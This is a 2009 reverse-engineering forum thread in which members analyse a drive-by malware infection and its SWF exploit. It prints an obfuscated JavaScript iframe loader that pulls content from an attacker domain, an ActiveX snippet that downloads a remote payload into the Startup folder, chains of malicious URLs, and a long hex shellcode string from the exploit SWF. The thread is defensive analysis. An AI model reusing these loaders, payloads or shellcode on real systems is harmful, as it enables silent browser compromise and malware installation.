View Full Version : fun malware cryptor ~;


evaluator
February 1st, 2009, 06:51
from http://www.offensivecomputing.net/?q=blog/11595

it does fun call second time to new_EIP from KERNEL32.dll
good trick, static analysis will fail.
also new is: it unmaps self_mapview & again allocates memory at Base_address. OEP will start in new thread.

Kayaker, you will click on logo_hearts! so niiiiiiiceee..
http://store.worldnewsdot.com/

passw: malware

Kayaker
February 2nd, 2009, 02:31
Quote:
[Originally Posted by evaluator]
Kayaker, you will click on logo_hearts! so niiiiiiiceee..


Aaaahh, how sweet..

Youandme.exe. Keeps changing its name. Looks like the fake Obama site has disappeared too.


OK, I've got one for you Eval-Unpucks-In-Sleep-uator.


I've never seen this before either. A funky bit of code which manipulates offsets and memory addresses to directly jump to a CALL ECX instruction in ntdll. The value of ECX is set to an address in the 40xxxx range.


At the start of the malware an SEH is set (at 4010F9) and an invalid instruction is run which triggers the SEH. In the SEH you quickly reach the instruction:

Code:

:00401146 FF E0 jmp eax


EAX at this point has been adjusted to be 7C9037BD, and ECX is 401888.

Therefore the JMP EAX directly calls the following instruction in ntdll, with the CALL ECX offset being 401888:


Code:

:u eax (Softice)
:7C9037BD FFD1 CALL ECX ; 401888
:7C9037BF 648B2500000000 MOV ESP,FS:[00000000]
:7C9037C6 648F0500000000 POP DWORD PTR FS:[00000000]
:7C9037CD 8BE5 MOV ESP,EBP
:7C9037CF 5D POP EBP
:7C9037D0 C21400 RET 0014



That CALL ECX is part of the larger ntdll function ExecuteHandler2:

Code:

:7C903799 ExecuteHandler2@20 proc near ; CODE XREF: ExecuteHandler@20+1F
:7C903799
:7C903799 arg_0 = dword ptr 8
:7C903799 arg_4 = dword ptr 0Ch
:7C903799 arg_8 = dword ptr 10h
:7C903799 arg_C = dword ptr 14h
:7C903799 arg_10 = dword ptr 18h
:7C903799
:7C903799 push ebp
:7C90379A mov ebp, esp
:7C90379C push [ebp+arg_4]
:7C90379F push edx
:7C9037A0 push large dword ptr fs:0
:7C9037A7 mov large fs:0, esp
:7C9037AE push [ebp+arg_C]
:7C9037B1 push [ebp+arg_8]
:7C9037B4 push [ebp+arg_4]
:7C9037B7 push [ebp+arg_0]
:7C9037BA mov ecx, [ebp+arg_10]
:7C9037BD call ecx
:7C9037BF mov esp, large fs:0
:7C9037C6 pop large dword ptr fs:0
:7C9037CD mov esp, ebp
:7C9037CF pop ebp
:7C9037D0 retn 14h
:7C9037D0 ExecuteHandler2@20 endp



Sure enough this works. Even though the execution path goes from 401146 to the middle of an ntdll function (which immediately Calls to 401888), the ntdll function does eventually return with all the correct stack back into 40xxxx, and things continue on their merry way.



Here's the story behind the malware. I was browsing around, with Opera, and hit on an sql injected website which had an Iframe exploit embedded in it.

Suddenly ZoneAlarm warned me of some exe wanting to run within svchost.exe, and do I want to allow it? Duh. No. Turns out it had already modified my registry, but I was able to catch everything it had done before there was any permanent damage.


The exe file runs from "C:\Documents and Settings\MYOB\Local Settings\Temp\wJQs.exe" and copies itself to %windir%/digeste.dll.

The exe and dll file are identical except for the PE.Characteristics byte.

It modifies the key (the first 4 entries in the list are OK)

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SecurityProviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"


That's it. Search around for "digeste.dll" for further info.



To debug the Iframe javascript I dumped it (from the source of the site page I had browsed to) into a blank html file. I then added a window.alert popup box command to display the decoded Iframe, as well as a document.writeln command to display the Math.random result.

I know there are plugins and such to decode JS, but this direct method was just as easy. There were actually 2 JS instances, both almost identical, so I only include one.

Here is the Iframe exploit. If you wish to run it, it will simply display a message box with the decoded Iframe, then the random number in the html page. And of course it will attempt to connect to http://7speed.info, but I don't believe the site exists any longer, but do disconnect from the net if you like.


Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>

<body>

<script language=JavaScript>

function uawebnb25(z)
{
var c=z.length;
var m=1024;
var i,s,h,b=0;
var w=0,x=0;

var d=Array(63,49,23,17,58,10,32,61,12,50,0,0,0,0,0,0,29,35,39,56,27,14,36,47,55,53,54,38,57,20,7,18,37,60,6,13,9,45,40,5,52,11,34,0,0,0,0,28,0,26,15,33,41,30,44,24,42,25,3,2,43,4,51,21,46,1,16,48,62,59,22,8,31,19,0);

for(s=Math.ceil(c/m); s>0; s--)
{
h='';

for(i=Math.min(c,m); i>0; i--,c--)
{
{
x|=(d[z.charCodeAt(b++)-48])<<w;

if(w)
{
h+=String.fromCharCode(231^x&255);
x>>=8;
w-=2
}else{
w=6
}
}
}


// START DEBUGGING

//document.writeln("h = " + h + "<br>"); // h = window.status='Done';document.write('')

window.alert(h);

// window.status='Done';document.write('<iframe name=356159
// src="http://7speed.info/t/?'+Math.round(Math.random()*29463)+'356159'+'"
// width=427 height=69 style="display:none"></iframe>')


var x;
x = Math.round(Math.random()*29463)+'356159';
document.writeln("x = " + x + "<br>");

// x = 10906356159; x = 677356159, etc.

// END DEBUGGING


eval(h);
}
}

uawebnb25('r4gZjZwFTyLFREdFMhSsAZgZkk8HjZwcOhV6TEi9rvdAy5CnzGUAqvdc55C1TaVZkhSIONUIOu71MvTca2QAyELP@A89ryLPk5C6TugZqZw9yZ8JznfhRELAT2TZOKC6blhcytg9oagZjZVZbu_nou7X3yUn8j8IONUIOuSs8j_1NjdAjELAab@IrxQAk4w6bEdJ3u71MEdBY5VJWbVAMeLZR4iHTZgZkv_JDAfAqvdc55gJzu8')

</script>

</body>
</html>




The attachment contains the exe, dll and the above html file renamed as *.txt


Password: malware

evaluator
February 2nd, 2009, 04:43
i unpacked it for you (forgot to ask, if you need..)

please, explain me, i also mostly use Opera
& so i can be infected by Opera? (should we notify Opera team?)

Kayaker
February 2nd, 2009, 13:34
Quote:
[Originally Posted by evaluator;79085]i also mostly use Opera
& so i can be infected by Opera?


Apparently. By this type of Iframe attack at least. To be honest, I was surprised too, not really knowing exactly how these things worked. I suppose using Opera will protect you from the IE/ActiveX based attacks, but somehow that exploit allowed not only a download, but to run the executable as well.


I had done a bit of research afterwards and figured the web site had been compromised by MPack (or similar)

http://en.wikipedia.org/wiki/MPack_(software)

They interviewed one of the MPack authors and his suggestion was:

Quote:
I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.


http://www.securityfocus.com/news/11476?ref=oc

evaluator
February 2nd, 2009, 16:22
yaa.. i mostly like without jscript, but 80% sites requires you jscript..

Kayaker
February 3rd, 2009, 03:35
For interest, here's what the rest of that http://7speed.info Iframe exploit does. The specific details were probably a bit different from what I encountered, but it's probably pretty close.


http://drupal.org/node/356093#comment-1189521

Quote:


Right after the body tag you have the following snippet of code:

Code:

<script language=JavaScript>function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46,55,62,3,29,34,25,59,38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,54,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9kocz0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ')</script><!-- hiddenmesa.com -->


It decodes to:

Code:

window.status='Done';document.write('<iframe name=5e4792 src="http://7speed.info/t/?'+Math.round(Math.random()*17808)+'5e4792'+'" width=212 height=84 style="display:none"></iframe>')


Which fetches the attack vectors from 7speed.info via a number of iframes:

Code:

<iframe src=http://mysexydreams.net/img/stat/jam.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://209.160.67.56/va.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://ffseik.com/sss/in.cgi?14 width=1 height=1 style="display:none"></iframe>


va.php fetches:

Code:

<iframe src=http://papampam.net/in.cgi?pipka2 width=1 height=1 style="display:none"></iframe>


and this fetches:

Code:

<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "http://portulote.com/cache/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsers.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>

<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>
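
Added example, not part of any post in this thread: a static decoder for this family of injected loaders that recovers the string handed to eval() without evaluating, rendering or fetching anything. The function names are hypothetical; the sample text is the ttbnb25 script quoted above, with stray spaces of the kind forum software inserts into long tokens left in on purpose.

```javascript
// Static analysis only: the loader is held as inert text and never executed.
const SAMPLE = [
  "function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(",
  "63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46 ,55,62,3,29,34,25,59,",
  "38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,",
  "5 4,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);",
  "for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){",
  "{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);",
  "x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('",
  "8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo",
  " ",
  "9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9koc",
  " ",
  "z0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ",
  "')",
].join("");

// Pull the three per-sample parameters out of the script text: the lookup
// table, the XOR key, and the encoded argument. Each variant on this page
// uses a different table and key, so nothing is hard-coded.
function extractLoaderParams(source) {
  const tableMatch = source.match(/Array\(([\d,\s]+)\)/);
  const keyMatch = source.match(/fromCharCode\(\s*(\d+)\s*\^/);
  const payloadMatch = source.match(/\(\s*'([A-Za-z0-9@_\s]{16,})'\s*\)/);
  if (!tableMatch || !keyMatch || !payloadMatch) {
    throw new Error("not a recognised loader: table, key or payload missing");
  }
  // Remove whitespace before splitting so a wrapped "5 4" is read as 54.
  const table = tableMatch[1].replace(/\s+/g, "").split(",").map(Number);
  if (table.some(Number.isNaN)) throw new Error("lookup table is malformed");
  return { table, key: Number(keyMatch[1]), payload: payloadMatch[1] };
}

// Same arithmetic as the loader: each character maps to a 6-bit value, the
// values are packed least-significant-bits first, and every completed byte is
// XORed with the key. Four input characters yield three output bytes.
function decodeLoader(payload, table, key) {
  let acc = 0;
  let shift = 0;
  let out = "";
  for (const ch of payload.replace(/\s+/g, "")) {
    const idx = ch.charCodeAt(0) - 48;
    if (idx < 0 || idx >= table.length) {
      throw new RangeError("character outside the lookup table: " + JSON.stringify(ch));
    }
    acc |= table[idx] << shift;
    if (shift) {
      out += String.fromCharCode((acc & 255) ^ key);
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6;
    }
  }
  return out;
}

// URLs named in the decoded text, for blocklists or proxy-log searches.
function iframeUrls(decoded) {
  return decoded.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

function analyseLoader(source) {
  const { table, key, payload } = extractLoaderParams(source);
  const decoded = decodeLoader(payload, table, key);
  return { key, tableLength: table.length, decoded, urls: iframeUrls(decoded) };
}

console.log(analyseLoader(SAMPLE));
```
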


evaluator
February 3rd, 2009, 09:33
good. next time, if you'll browse mal_sites, turn on packet capture..

passw is yo'r name

Kayaker
February 3rd, 2009, 10:40
Actually I just found my notes. The hacked website was (and still is!)

WARNING WARNING - INFECTED SITE

www thehumblest net

WARNING WARNING - INFECTED SITE

It's still infected with the exploit, though it's slightly different now and there's only 1 instance. The Iframe now translates to:

Code:

window.status='Done';document.write('<iframe name=2920bf
src="http://7speed.info/t/?'+Math.round(Math.random()*28210)+'2920bf'+'"
width=403 height=70 style="display:none"></iframe>')



I checked it with Javascript disabled, not sure if it still connects, but like I said the script has been changed since I went there Jan 6. It was actually a Google cache of the site I browsed to, but that's obviously no protection.

The site itself is innocent. Was going to warn the author but couldn't find an email. I had just read an odd old SciFi novel by Jack Vance, Tales of Dying Earth, and there was a review on that site. (See, I wasn't chasing pr0n sites)

I'm not quite ready to tackle it with Wireshark and JS enabled...would need to set up a VM first.

Any suggestions by the experts on how best to safely analyze such a site and to decode the steps that would occur while your system is being compromised?


Thanks for the pw of your unpacked file attachment btw, I hadn't gotten completely around to dumping it.

evaluator
February 3rd, 2009, 15:10
i did go there, but it finishes with this redirection:

http://podsmotrim.net/log/404.php

edit:
Code:

<A HREF="http://8speed.info/t/?48804c97d9" target=_blank>8speed.info/t/?48804c97d9</A><BR>
<A HREF="http://8speed.info/t/?206014b22" target=_blank>8speed.info/t/?206014b22</A><BR>
<A HREF="http://sexbases.cn/sexy.html" target=_blank>sexbases.cn/sexy.html</A><BR>
<A HREF="http://sexbases.cn/v.php" target=_blank>sexbases.cn/v.php</A><BR>
<A HREF="http://podsmotrim.net/log/new.php" target=_blank>podsmotrim.net/log/new.php</A><BR>
<A HREF="http://vienmoreter.com/pages.html" target=_blank>vienmoreter.com/pages.html</A><BR>
<A HREF="http://vienmoreter.com/cache/" target=_blank>vienmoreter.com/cache/</A><BR>
<A HREF="http://vienmoreter.com/kebab/info.php" target=_blank>vienmoreter.com/kebab/info.php</A><BR>
<A HREF="http://podsmotrim.net/log/flash.php" target=_blank>podsmotrim.net/log/flash.php</A><BR>
<A HREF="http://podsmotrim.net/log/404.php" target=_blank>podsmotrim.net/log/404.php</A><BR>

Kayaker
February 3rd, 2009, 16:51
Quote:

http://podsmotrim.net



Which, not surprisingly, is listed here as an abusive domain name (under "P")

http://hostexploit.com/?option=com_content&view=article&id=74&Itemid=84

Extremist
February 3rd, 2009, 23:50
evubulator is unpuc-king

Kayaker
February 4th, 2009, 02:11
Aye..


evaluator
February 4th, 2009, 03:37
hey! but i get SWF, which i ignored.
then i unpacked it (ZLB) & see there many HEX-chars. huh!?

ok, then i extracted chars & converted HEX-2-bin.
in result i get 12 SWF with same look, but with little difference.
i don't know swf decompiling, so now your move!

BtW, this possible-malicious swf can be flash-version dependent.
what version you had in January?

dELTA
February 5th, 2009, 06:50
Just a note about the exploits themselves that let the code into your computer to begin with, and regarding "if you can be infected in Opera"...

Most exploits today are browser independent, and instead make use of vulnerabilities in third-party extensions, out of which the most commonly exploited are Adobe Acrobat (PDF), Flash (SWF), Quicktime and Java. Thus, you're no longer safe no matter which browser you use, but must rather always keep all third-party extensions updated at all times too in order to be (at least somewhat) safe.

There are apparent traces in the output above of at least an Acrobat exploit being used, but most of the time these days the bad guys fire off a whole battery of exploits, for practically all top 20 vulnerabilities they know of or so, in order to make you trip on at least one of them, which is all they need...

Oh, and if you need help to analyze the potentially malicious SWF, maybe you should bring e.g. schizoM into the thread (I just PM:ed him about it), or some of the other SWF pros around here...

esther
February 5th, 2009, 09:10
I did use some action script decompiler trying to extract what is inside (12swf), only an image file and main timeline file, nothing else...

schizoM
February 5th, 2009, 09:23
I decompiled it
but it is very interesting..
I attached decompiled AS3

In rest of swf files, there are no interesting things.

But in opr_swf012PO are..
file is interesting because there is tag 3F 12:
3F
00111111

12
00010010

byte swapping
0001001000111111

0001001000 (10 bits) tag type = 72
I don't know what is 72 tag ?

In AS3 there should be tag type 82 like BF 14

flash 10
This table provides a quick lookup, allowing any tag in the SWF specification to be found by its tag value.

Tag value   Tag name
70          PlaceObject3
71          ImportAssets2
73          DefineFontAlignZones
74          CSMTextSettings
75          DefineFont3
76          SymbolClass
77          Metadata
78          DefineScalingGrid


Moreover only Sothink decompiler can decompile it...
but I must add long String myself.
I don't know how it works but I think there is buffer overflow bug in flash player nice...

esther
February 5th, 2009, 09:44
Hi,it says file corrupted in version 4.4
thanks for the effort

dELTA
February 5th, 2009, 09:57
Thanks for taking a look schizoM.

And just to straighten things out for some other people:
If an SWF is malicious in the way that it tries to exploit your computer like this, the malicious parts will most likely not be on an Action Script or even application level, but rather on the level of SWF file format or AS bytecode (just like schizoM mentions above, it normally targets a buffer overflow vulnerability in Flash player). This in turn makes it useless to just try to decompile the file with a normal Action Script decompiler, but rather, you'd need low-level Flash knowledge and/or tools to make any useful analysis. This is exactly what schizoM has got, so that's why I asked him instead of recommending running it through an AS decompiler.

schizoM
February 5th, 2009, 10:16
Quote:
[Originally Posted by dELTA;79138]Thanks for taking a look schizoM.

And just to straighten things out for some other people:
If an SWF is malicious in the way that it tries to exploit your computer like this, the malicious parts will most likely not be on an Action Script or even application level, but rather on the level of SWF file format or AS bytecode (just like schizoM mentions above, it normally targets a buffer overflow vulnerability in Flash player). This in turn makes it useless to just try to decompile the file with a normal Action Script decompiler, but rather, you'd need low-level Flash knowledge and/or tools to make any useful analysis. This is exactly what schizoM has got, so that's why I asked him instead of recommending running it through an AS decompiler.


My SWF Reader can't read this file :/ This swf is preparely deform.
I think that Zasder is exploit class and it is in:
Code:

ldr = new Loader();
ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, completeHandler);
ldr.loadBytes(_loc_16);



public function completeHandler(param1:Event) : void
{
Lib.current.stage.addChild(ldr);
return;
}// end function


and var _loc_1:String , var _loc_1:String , etc are shellcode.
Bug is in Lib.current.stage.addChild.
Maybe someone know what this shellcode do.

schizoM
February 5th, 2009, 10:18
Quote:
[Originally Posted by esther;79137]Hi,it says file corrupted in version 4.4
thanks for the effort


You have cracked version of Sothink Decompiler
Someone remove swf header so, I must add new header. I think that someone remove header when try unpack file.

esther
February 5th, 2009, 10:46
tbh I'm fairly new in swf stuff, it does able to decompile lena's stuff (testing purposes), maybe its the obfuscation of the file I really don't know anyway thanks for the file

evaluator
February 5th, 2009, 12:25
>>Someone remove swf header so, I must add new header.

heeey!
i said, i unpacked it as zlib. here origin swf, if u wanna itt

schizoM
February 5th, 2009, 12:58
and You remove header

If someone want decompile this file should use Sothink Decompiler 4.5 other decompilers like asv6 or Eltima can't decompile this file.

I add p-code, raw (bytecode) from Sothink.

I have not time for analyse this swf now (must learn to exams)

evaluator
February 5th, 2009, 13:42
no i not removed..

when you decompress ZLIB stream, it will without header.

schizoM
February 5th, 2009, 16:12
I understand You but...
You use ZLIB decompressor so You remove SWF header by software
ZLIB decompressor remove 8 bytes from swf

You should use swf decompressor or add 8 bytes after decompressing lol
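
Added example, not from any poster in the thread: in a compressed (CWS) SWF the first 8 bytes (signature, version, 32-bit file length) are stored uncompressed and the zlib stream starts at offset 8, so inflating only the stream yields a body with no header. The sketch below puts that header back and walks the tag records using the same 10-bit code / 6-bit length split worked through by hand earlier in the thread. Function names and the sample body are constructed for illustration.

```javascript
// Names for tags 70-78 come from the spec table quoted earlier in the thread;
// 0, 1, 9, 69 and 82 are the standard End, ShowFrame, SetBackgroundColor,
// FileAttributes and DoABC tags. Anything else is reported with name null.
const TAG_NAMES = {
  0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 69: "FileAttributes",
  70: "PlaceObject3", 71: "ImportAssets2", 73: "DefineFontAlignZones",
  74: "CSMTextSettings", 75: "DefineFont3", 76: "SymbolClass",
  77: "Metadata", 78: "DefineScalingGrid", 82: "DoABC",
};

// Constructed sample: an inflated SWF body (no 8-byte header).
const SAMPLE_BODY = Uint8Array.from([
  0x00,                                        // RECT with Nbits = 0 (one byte)
  0x00, 0x0c,                                  // FrameRate
  0x01, 0x00,                                  // FrameCount
  0x44, 0x11, 0x08, 0x00, 0x00, 0x00,          // tag 69, short header, 4 bytes
  0x3f, 0x12, 0x03, 0x00, 0x00, 0x00, 0xaa, 0xbb, 0xcc, // tag 72, long header
  0xbf, 0x14, 0x02, 0x00, 0x00, 0x00, 0x01, 0x02,       // tag 82, long header
  0x40, 0x00,                                  // tag 1 (ShowFrame)
  0x00, 0x00,                                  // tag 0 (End)
]);

// Prepend "FWS", the version byte and the little-endian total length.
function restoreHeader(body, version) {
  const out = new Uint8Array(body.length + 8);
  out.set([0x46, 0x57, 0x53, version & 0xff], 0);
  new DataView(out.buffer).setUint32(4, out.length, true);
  out.set(body, 8);
  return out;
}

// Walk the tag records of an uncompressed SWF. Lengths are bounds-checked so
// a deliberately malformed file ends the walk with a truncated entry instead
// of reading past the buffer.
function listTags(swf) {
  const sig = String.fromCharCode(swf[0], swf[1], swf[2]);
  if (sig === "CWS") throw new Error("compressed SWF: inflate bytes 8.. first");
  if (sig !== "FWS") throw new Error("no SWF signature: header missing?");
  const view = new DataView(swf.buffer, swf.byteOffset, swf.byteLength);
  const nbits = swf[8] >> 3;                       // top 5 bits of the RECT
  let pos = 8 + Math.ceil((5 + 4 * nbits) / 8) + 4; // RECT + rate + count
  const tags = [];
  while (pos + 2 <= swf.length) {
    const codeAndLength = view.getUint16(pos, true); // e.g. 3F 12 -> 0x123F
    const code = codeAndLength >> 6;                 // upper 10 bits
    let length = codeAndLength & 0x3f;               // lower 6 bits
    let headerSize = 2;
    if (length === 0x3f) {                           // long form: 32-bit length
      if (pos + 6 > swf.length) {
        tags.push({ offset: pos, code, name: TAG_NAMES[code] || null, length: null, truncated: true });
        break;
      }
      length = view.getUint32(pos + 2, true);
      headerSize = 6;
    }
    const truncated = pos + headerSize + length > swf.length;
    tags.push({ offset: pos, code, name: TAG_NAMES[code] || null, length, truncated });
    if (code === 0 || truncated) break;
    pos += headerSize + length;
  }
  return tags;
}

// Tag codes with no name in TAG_NAMES, for closer inspection.
function unnamedTagCodes(tags) {
  return tags.filter((t) => t.name === null).map((t) => t.code);
}

console.log(listTags(restoreHeader(SAMPLE_BODY, 9)));
```
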

schizoM
February 5th, 2009, 20:45
I think it can help You to understand this exploit:
http://www.matasano.com/log/1032/this-new-vulnerability-dowds-inhuman-flash-exploit/

esther
February 5th, 2009, 23:14
lol,I didn't use ZLIB,I'm using hexeditor,ollydbg copy and paste get the shit you have on swf12

evaluator
February 6th, 2009, 04:08
ok, enuf smiles.;
schizoM, is something interesting in that little decoded SWFs?

dELTA
February 6th, 2009, 05:10
Eval, I'd say schizoM pretty much already found everything interesting that can be found on the SWF level with this file. Now we're back at the x86 level, and that means it's your turn...

If you check out the "raw.txt" that schizoM attached above, you will find the following sequence, which is most likely the buffer overflow code (and thus really x86 code in some form, i.e. inside the "_as3_pushstring" data):
Code:
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 
4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815E1988AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65004000000021295F285F292A265E262524464848446B696A61657366206A666A 786620793820776F647320666177663332317335363420326331337331642033663234647365743334353933385F282A265E 54255E255E257A6A68677366206A687366206A20200000"
//80 0f
_as3_coerce String
//d5
_as3_setlocal <1>
//2c 2d
_as3_pushstring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
//80 0f
_as3_coerce String
//d6
_as3_setlocal <2>
//2c 2e
_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 